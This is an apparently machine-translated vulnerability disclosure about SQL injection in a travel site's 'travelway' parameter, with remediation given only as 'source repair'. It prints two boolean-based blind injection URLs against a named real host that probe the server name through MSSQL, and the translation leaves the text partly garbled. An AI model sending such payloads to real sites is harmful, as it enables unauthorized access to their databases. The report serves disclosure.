Tangscan plug-in for SQL Injection on a site in Suzhou Tongcheng 666
The SQL injection plug-in of Tangscan 666 from a website in Suzhou Tongcheng. waf is not omnipotent, and it cannot be used without waf.
Artifact: SQL Injection Vulnerability in Tongcheng tourism in Suzhou
Do you think it is useless to add waf? I have never played mssql.
So you should fix it from the source.
Return correct
Go.ly.com/ajax/GetNewRaiderInfo? Type = 1 & desItemId = & desItemKind = & travelway = 'cruise ') and left (@ SERVERNAME, 1) = 'T' and ('x' = 'X' & pageSize = 12 & pageindex = 1 & viewtype = 1 & iid = 0.9737567349802703
Error returned
Go.ly.com/ajax/GetNewRaiderInfo? Type = 1 & desItemId = & desItemKind = & travelway = 'cruise ') and left (@ SERVERNAME, 1) = 'X' and ('x' = 'X' & pageSize = 12 & pageindex = 1 & viewtype = 1 & iid = 0.9737567349802703
Solution:
Source repair